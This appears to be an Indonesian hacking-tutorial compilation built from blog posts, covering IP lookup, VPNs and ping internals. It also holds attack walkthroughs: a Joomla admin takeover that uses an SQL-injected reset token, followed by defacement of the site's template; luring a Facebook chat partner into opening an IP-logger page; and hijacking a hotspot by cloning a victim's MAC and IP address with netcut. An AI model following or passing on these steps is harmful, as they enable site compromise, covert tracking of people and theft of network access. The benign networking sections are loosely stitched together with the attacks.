Ini adalah standar Joomla! query untuk permintaan reset password

Lupa Password Anda? Halaman akan memuat.
Dalam E-mail Address: masukkan email admin (dalam kasus kami itu adalah: info@site.com) dan tekan Submit.
Jika Anda menemukan email yang tepat admin, Konfirmasikan akun Anda. halaman akan memuat, meminta Token:

Mencari Token

Untuk menemukan tanda kembali ke reiluke SQLiHelper 2,7 dan username sampah dan aktivasi dari jos153_users Nama Kolom

username: admin
aktivasi: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d adalah 32 Token verivikasi char, masuk dan pres Kirim.

Jika Anda melakukan semuanya ok, Istirahatkan halaman Password akan memuat. Masukkan password baru anda …

Setelah itu pergi ke:
http://www.site.com/administrator/
Standar Joomla konten portal sistem manajemen

Masukkan admin username dan password Anda, klik Login
Pergi ke Extensions >> Template Manager >> default Template Nama >> Edit HTML
Dalam Editor Template HTML memasukkan kode dirusak Anda, klik Terapkan, Simpan dan Anda selesai!

Untuk membuat hidup lebih sengsara admin, klik admin di jendela Joomla utama dan di halaman Rincian Pengguna perubahan E-mail admin

Exercise 1

a. IP Komputer Sendiri

Untuk mengetahui IP address komputer banyak sekali cara yang bisa dilakukan diantaranya dengan menggunakan command prompt, melalui status local area connection atau menggunakan tool pihak ketiga lainnya. Kali ini gue akan membahas tips trik windows untukmengetahui IP address komputer dengan cepat dan mudahtanpa menggunakan tool pihak ketiga. Tool windows yang kita gunakan untuk mengetahui IP address adalah command promptTips trik komputer ini bukan merupakan tips trik baru. Namun karena kebetulan ada teman yang menanyakan jadi saya bahas aja pada artikel kali ini. He..he..

Biar ga terlalu banyak basa basi, langsung aja saya berikan langkah-langkahnya:

  1. Seperti pada kebanyakan tips trik komputer dan windows yang saya posting, pertama yang kita lakukan adalah membuka kotak dialog Run dengan mengklik menu start >> Run.
  2. Kemudian ketik cmd dan tekan Enter untuk membuka command prompt.
  3. Pada jendela command prompt ketik “ipconfig” (tanpa tanda kutip) dan tekan Enter.
  4. Setelah itu akan muncul IP address komputer Anda disertai Subnetmask, Gateway dan DNS server yang Anda gunakan.

Cukup mudah bukan? Namun, jika Anda berada pada suatu jaringan LAN dan Anda menggunakan koneksi internet yang merupakan hasil sharing dari komputer lain, maka Anda hanya akan menerima IP Address, Subnet, DNS Server dan Gateway jaringan lokal. Anda tidak akan bisa mengetahui IP, Subnet, DNS, dan Gateway dari Internet Service Provider (ISP) Anda. Tapi jangan khawatir masih ada cara lain kok. Anda cukup menambahkan parameter lain dari command yang Anda ketik pada CMD yaitu parameter “/all” (tanpa tanda kutip). Jadi perintah lengkapnya adalah “ipconfig /all”.
Demikian tips trik windows singkat untuk mengetahui IP address yang bisa saya berikan semoga membantu. Selamat Mencoba!

Atau Dengan cara ini

Beberapa waktu yang lalu blog BismillahGratis ini memposting artikel tentang cara mengetahui IP Address. Pada artikel tersebut kita bisa mengetahui ip address komputer, DNS, dan Gateway dari Internet Service Provider kita secara lengkap. Tool yang kita gunakan Command Prompt dengan hanya mengetikkan perintah “ipconfig /all”.
Kali ini, saya mempunyai sebuah tips dan trik lagi untuk mengetahui IP Address komputer kita dan tool yang digunakan masih sama yaitu CMD. Namun yang berbeda adalah perintahnya. Dengan CMD kita akan memanggil fungsi dari aplikasi Netsh.exe. Netsh.exe adalah sebuah aplikasi yang berfungsi untuk mengetahui pengaturan TCP/IP dari komputer kita. Selain itu, Netsh.exe juga bisa kita gunakan untuk mengkonfigurasi TCP/IP dari LAN card kita. Namun pada kesempatan ini yang saya bahas hanya cara mengetahui konfigurasi IP Address, Subnet Mask dan Gateway dari komputer kita. Berikut langkah-langkahnya:

  1. Seperti pada tips komputer terdahulu yang Anda buka pertama adalah command Prompt.
  2. Caranya adalah dengan klik Start >> Run. Ketik CMD dan tekan Enter.
  3. Pada command prompt, ketik “netsh interface ip show config” dan tekan tombol Enter.
  4. Jika, Local Area Network (LAN) Card Anda telah terkonfigurasi atau terhubung ke LAN maka akan muncul hasil seperti dibawah:
  • Configuration for interface “Local Area Connection”
  • DHCP enabled: No
  • IP Address: 192.168.0.10
  • SubnetMask: 255.255.255.0
  • Default Gateway: 192.168.0.1
  • GatewayMetric: 0
  • InterfaceMetric: 0
  • Statically Configured DNS Servers: 192.168.0.1
  • Statically Configured WINS Servers: None
  • Register with which suffix: Primary Only

Sampai disini semuanya telah selesai. Cukup mudah bukan? Hasil perintah tadi mungkin berbeda pada komputer Anda. Hal ini tergantung dari konfigurasi TCP/IP komputer Anda.
Demikian tips trik windows singkat untuk mengetahui IP Address komputer.

Selamat mencoba.

b. IP Komputer Lain

Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.

Ada beberapa yang perlu disiapkan yaitu:

  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.

Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html

Cara yang dipakai disini adalah:

  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html

Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.

– See more at: http://www.binushacker.net/cara-mengetahui-ip-lawan-via-chatting-facebook.html#sthash.XaaG07E4.dpuf

c. Lokasi berdasarkan IP yg digunakan

Cara Melacak Lokasi Suatu IP Address

Cara Melacak Lokasi Suatu IP Address – Artikel kali ini adalah sebuah artikel yang saya buat dikarenakan adanya pertanyaan mengenai artikel saya sebelumnya yang bertemakan Sembunyikan IP Dengan Real Hide IP.Ada salah seorang pengunjung bagaimana Cara Melacak Lokasi Suatu IP Address ?? Dikarenakan saya sedang tidak berada didepan laptop saya tidak bisa memberikan petunjuk yang jela,dan akhirnya saya membuat artikel saya yang ini.

Cara Melacak Lokasi Suatu IP Address ini sebenanrnya digunakan untuk orang yang ingin mengetahui dimana letak IP Address yang dicari.Melacak Lokasi Suatu IP Addresssebenarnya gampang tidak terlalu susah,sebenarnya teman – teman dapat mencari dari pencarian google dengan kata kunci Cara Melacak IP Address namun saya langsung membuatkan saja mengenai bagaimana Cara Melacak Lokasi Suatu IP Address.

Mari kita lihat beberapa tools yang sering saya gunakan dalam mencari Lokasi suatu IP Address :

Cara Mengecek Lokasi Suatu IP Address

Berikut ini adalah 2 tools online yang sering saya gunakan untuk melakukan tracert IP yang mencurigakan kepada blog saya :

Disana teman – teman tinggal memasukan alamat IP Address yang teman – teman ingin trace atau lacak dimana lokasinya IP Address tersebut.Bagaimana ?? Mudah bukan ?? Teman – teman sekarang bisa tau darimana saja IP Address tersebut berasal.

Mungkin sekian dulu informasi sederhana saya mengenai bagaimana Cara Melacak Lokasi Suatu IP Address,semoga dengan adanya informasi sederhana yang saya berikan ini dapatMelacak Lokasi Suatu IP Address yang ingin teman – teman cari keberadaannya.

Sekian dulu informasi sederhana saya dan silahkan teman – teman mencobanya sendiri dalam melakukan sebuah tracert atau pelacakan.Sekaian informasi sederhana saya mengenai bagaimana Cara Melacak Lokasi Suatu IP Address.

d. Hide IP

Memang banyak cara menuju roma untuk menghindari blok situs pada komputer dari mengganti proxy menggunakan web online proxy tapi ternyata dari cara tersebut sudah sering diketahui dari kebanyakan. Jadi bagaimana kita menyembunyikan IP dan aman menjelajahi web secara anonim? saya akan mengatakan VPN mungkin adalah solusi terbaik dan utama untuk melewati sensor internet dengan cara yang aman.

VPN adalah singkatan dari virtual private network, yaitu jaringan pribadi (bukan untuk akses umum) yang menggunakan medium nonpribadi (misalnya internet) untuk menghubungkan antar remote-site  secara aman. Perlu penerapan teknologi  tertentu agar walaupun menggunakan medium yang umum, tetapi traffic  (lalu lintas) antar remote-site tidak dapat disadap dengan mudah, juga tidak memungkinkan pihak lain untuk menyusupkan traffic  yang tidak semestinya ke dalam remote-site.

Mungkin, yang paling populer di antara semua penyedia VPN bebas adalah Hotspot Shield adalah OpenVPN berbasis privasi dan alat keamanan, digunakan untuk mengenkripsi browsing web anda ketika di hotspot publik dan untuk menghindari filter web.

Berikut adalah langkah-langkah untuk menggunakannya.

Download Hotspot Shield dan kemudian menginstal paket tersebut. Jadi, jika Anda menggunakan layanan VPN, anda dapat mengunjungi situs-situs yang telah di filter sama halnya ketika anda berada dalam jaringan terbatas atau disensor dan menggunakan VPN untuk terhubung ke jaringan tersebut. Beberapa layanan VPN populer dan gratis yang dapat membantu anda menjelajahi web sebebas mungkin tanpa khawatir tentang privasi dan masalah sensor.

Pastikan saat melakukan instalasi anda terkoneksi dengan internet seperti yang terlihat pada gambar dibawah ini :

Setelah selesai download tersebut lakukan instalasi pada bagian instalasi pada gambar dibawah ini anda bisa melakukan pengaturan yang ingin anda gunakan.

Klik Next dan jika ada jendela yang menandakan klik install setelah selesai anda akan melihat pada icon di taskbar

Klik kanan pada ikon program di taskbar untuk mengaktifkan koneksi VPN aktif atau nonaktif. Tidak perlu mendaftar atau membayar untuk layanan tersebut, tetapi Anda akan menerima iklan dan kadang-kadang terpaksa URL diredirect.

e. Numpang IP Lain

Tutorial ini sangat mudah, kita hanya membutuhkan aplikasi netcut untuk menumpang IP client yang sudah terhubung ke Wi-Fi (Wireless Fidelity). Lho kok cuma numpang?, kalo pengen full gratisannya, bayar donk ke yang punya WiFi. Tapi tenang saja, biarpun numpang tapi kita masih dapat mengakalinya agar koneksi internet kita lancar. Nah, langsung saja berikut ini langkah-langkahnya:

1. Download netcut disini, kemudian install.

2. Setelah proses instalasi selesai, koneksikan PC kita ke Wi-Fi (hotspot) target (securitynya mikrotik). Kalau sudah konek, kita akan mendapatkan IP Address, berbeda dengan hotspot yang keamannya wep atau wpa.

3. Lihat juga DNS Server kita. Caranya, masukkan perintah “ipconfig/all” (tanpa tanda petik) di Command Prompt (cmd).

4. Buka browser kesayangan anda, masukkan url terserah, anda akan dialihkan ke halaman login, kurang lebih seperti pada gambar.

5. Untuk membypass login tersebut, buka program netcut, kemudian klik Choice NetCard dan pilih Wireless Network Adapter anda. Pada contoh, netwok adapter yang aku gunakan Atheros AR5B97.

6. Pada halaman utama netcut, tertera daftar IP client yang terkoneksi ke jaringan wi-fi, beserta host name dan MAC Address (Physical Address). Pilih IP target, yang jelas bukan IP kita dan bukan IP Server (GateWay IP).

7. Copy IP target beserta MAC Addressnya di notepad, untuk memudahkan klik tab Print Table.

Misal, pada contoh IP target 10.10.1.57 dengan MAC Address 88:C6:63:A7:24:0E, aku pilih yang nggak ada host name nya karena biasanya korban menggunakan HP. Jadi kalau korban menggunakan HP pasti dia tidak menghabiskan bandwith.

8. Setelah itu, disconnect dulu. Ubah MAC Address kita sama seperti MAC Address target. Ingat, beda network adapter beda Property, pokoknya pada intinya pilih yang berbau Adrress, MAC dan Network. Pada contoh nama propertynya Network Address.

Untuk mengubah MAC Address dapat juga menggunakan Technitium MAC Address Changer.

9. Ubah juga IP Address kita sama seperti IP target, serta ubah DNS Server Address. Untuk mengisi DNS Server, lihat point 3.

10. Setelah IP dan MAC Address kita sudah sama seperti IP target, koneksikan kembali PC kita ke Wi-Fi tujuan dan tunggu sampai konek.

11. Happy browsing.

f. Ping ke komputer lain

PING

Apa itu test Ping? Bagaimana melakukan Test Ping dari PC saya?

Test Ping adalah metode untuk melakukan tes koneksi dengan Command Prompt (Windows) untuk mengetahui kualitas koneksi jaringan dari PC anda ke jaringan ditempat lain yang telah terhubung ke PC anda baik itu melalui jaringan lokal (intranet) ataupun jaringan luas (internet).

Cara melakukan test ping dari PC anda:

  1. Buka Command Prompt, Start -> Program -> Accessories -> Command Prompt atau dengan mengetik cmd dari RUN.
  2. Pada Command Prompt ketik perintah ping ip address parameter (parameter diberikan sesuai keperluan). Misalnya perintah ping 203.84.136.33 -n 100
    Tambahan parameter -n 100 yang akan menghasilkan reply sebanyak 100 kali.
    Sebagai tambahan, parameter adalah aksesori kelengkapan perintah dari suatu perintah utama. Dalam pembahasan ini, ping mempunyai banyak parameter, diantaranya adalah -t (terus menerus), -n angka (ditentukan berdasarkan angka) dll.
  3. Jika koneksi lancar dan tidak ada gangguan maka akan muncul pesan reply
  4. Jika koneksi terputus atau ada masalah maka akan muncul pesan “Request Timed Out”.
  5. Anda juga bisa melakukan test ping langsung ke domain name (tanpa perlu mengetikkan ip addressnya) , contoh “ping yahoo.com”.

PERJALANAN PING

Pada contoh ini, seorang user di Host A melakukan ping ke alamat IP Host B. Mari kita cermati langkah demi langkah perjalanan datanya :

  1. Internet Control Message Protocol (ICMP) menciptakan sebuah payload (data) pemintaan echo (di mana isinya hanya abjad di field data).
  2. ICMP menyerahkan payload tersebut ke Internet Protocol (IP), yang lalu menciptakan sebuah paket. Paling sedikit, paket ini berisi : sebuah alamat asal IP, sebuah alamat tujuan IP, dan sebuah field protocol dengan nilai 01h (ingat bahwa Cisco suka menggunakan 0x di depan karakter heksadesimal , jadi di router mungkin terlihat seperti 0×01). Semua itu memberitahukan kepada host penerima tentang kepada siapa host penerima harus menyerahkan payload ketika network tujuan telah dicapai – pada contoh ini host menyerahkan payload kepada protocol ICMP.
  3. Setelah paket dibuat, IP akan menentukan apakah alamat IP tujuan ada di network local atau network remote.
  4. Karena IP menentukan bahwa ini adalah permintaan untuk network remote, maka paket perlu dikirimkan ke default gateway agar paket dapat di route ke network remote. Registry di Windows dibaca untuk mencari default gateway yang telah dikonfigurasi.
  5. Default gateway dari host 192.168.0.7 (Host A) dikonfigurasi ke 192.168.0.1. Untuk dapat mengirimkan paket ini ke default gateway, harus diketahui dulu alamat hardware dari interface Ethernet 0 dari router (yang dikonfigurasi dengan alamat IP 192.168.0.1 tersebut) Mengapa demikian? Agar paket dapat diserahkan ke layer data link, lalu di-enkapsulasi menjadi frame, dan dikirimkan ke interface router yang terhubung ke network 192.168.0.0. Host berkomunikasi hanya dengan alamat hardware pada LAN local. Penting untuk memahami bahwa Host A, agar dapat berkomunikasi dengan Host B, harus mengirimkan paket ke alamat MAC (alamat hardware Network adapter (LAN Card) dari default gateway di network local.
  6. Setelah itu, cache ARP dicek untuk melihat apakah alamat IP dari default gateway sudah pernah di resolved (diterjemahkan) ke sebuah alamat hardware:
    Jika sudah, paket akan diserahkan ke layer data link untuk dijadikan frame (alamat hardaware dari host tujuan diserahkan bersama tersebut).
    Jika alamat hardware tidak tersedia di cache ARP dari host, sebuah broadcast ARP akan dikirimkan ke network local untuk mencari alamat hardware dari 192.168.0.1. Router melakukan respon pada permintaan tersebut dan menyerahkan alamat hardware dari Ethernet 0, dan host akan menyimpan (cache) alamat ini. Router juga akan melakukan cache alamat hardware dari host A di cache ARP nya.
  7. Setelah paket dan alamat hardware tujuan diserahkan ke layer data link, maka driver LAN akan digunakan untuk menyediakan akses media melalui jenis LAN yang digunakan (pada contoh ini adalah Ethernet). Sebuah frame dibuat, dienkapsulasi dengan informasi pengendali. Di dalam frame ini alamat hardware dari host asal dan tujuan, dalam kasus ini juga ditambah dengan field EtherType yang menggambarkan protocol layer network apa yang menyerahkan paket tersebut ke layer data link- dalam kasus ini, protocol itu adalah IP. Pada akhir dari frame itu terdapat sebuah field bernama Frame Check Sequence (FCS) yang menjadi tempat penyimpanan dari hasil perhitungan Cyclic Redundancy Check (CRC).
  8. Setelah frame selesai dibuat, frame tersebut diserahkan ke layer Physical untuk ditempatkan di media fisik ( pada contoh ini adalah kabel twisted-pair) dalam bentuk bit-bit, yang dikirim saru per satu.
  9. Semua alat di collision domain menerima bit-bit ini dan membuat frame dari bit-bit ini. Mereka masing-masing melakukan CRC dan mengecek jawaban di field FCS. Jika jawabannya tidak cocok, frame akan dibuang.
    Jika CRC cocok, maka alamat hardware tujuan akan di cek untuk melihat apakah alamat tersebut cocok juga (pada contoh ini, dicek apakah cocok dengan interface Ethernet 0 dari router).
    Jika alamat hardware cocok, maka field Ether-Type dicek untuk mencari protocol yang digunakan di layer Network dengan cara :
  10. Paket ditarik dari frame, dan apa yang tertinggal di frame akan dibuang. Paket lalu diserahkan ke protocol yang tercatat di field Ether-Type—pada contoh ini adalah IP.
  11. IP menerima paket dan mengecek alamat tujuan IP. Karena alamat tujuan dari paket tidak sesuai dengan semua alamat yang dikonfigurasi di router penerima itu sendiri, maka router penerima akan melihat pada alamat IP network tujuan di routing tablenya.
    Routing table harus memiliki sebuah entri di network 192.168.10.0, jika tidak paket akan dibuang dengan segera dan sebuah pesan ICMP akan dikirimkan kembali ke alamat pengirim dengan sebuah pesan “destination network unreachable” (network tujuan tidak tercapai)
    Jika router menemukan sebuah entri untuk network tujuan di tabelnya, paket akan dialihkan ke interface keluar (exit interface)—pada contoh, interface keluar ini adalah interface Ethernet 1.
  12. Router akan melakuakan pengalihan paket ke buffer Ethernet 1.
    Buffer Ethernet 1 perlu mengetahui alamat hardware dari host tujuan dan pertama kali ia akan mengecek cache ARP-nya.
  13. Jika alamat hardware dari Host B sudah ditemukan, paket dan alamat hardware tersebut akan diserahkan ke layer data link untuk dibuat menjadi frame.
  14. Jika alamat hardware tidak pernah diterjemahkan atau di resolved oleh ARP (sehingga tidak dicatat di cache ARP), router akan mengirimkan sebuah permintaan ARP keluar dari interface E1 untuk alamat hardware 192.168.10.3.

Host B melakukan respond dengan alamat hardwarenya, dan paket beserta alamat hardware tujuan akan dikirimkan ke layer data link untuk dijadikan frame.

  1. Layer data link membuat sebuah frame dengan alamat hardware tujuan dan asal , field Ether-Type, dan field FCS di akhir dari frame. Frame diserahkan ke layer Physical untuk dikirimkan keluar pada medium fisik dalam bentuk bit yang dikirimkan satu per satu.
  2. Host B menerima frame dan segera melakuakan CRC. Jika hasil CRC sesuai dengan apa yang ada di field FCS, maka alamat hardware tujuan akan dicek. Jika alamat host juga cocok, field Ether-Type akan di cek untuk menentukan protocol yang akan diserahi paket tersebut di layer Network—Pada contoh ini, protocol tersebut adalah IP.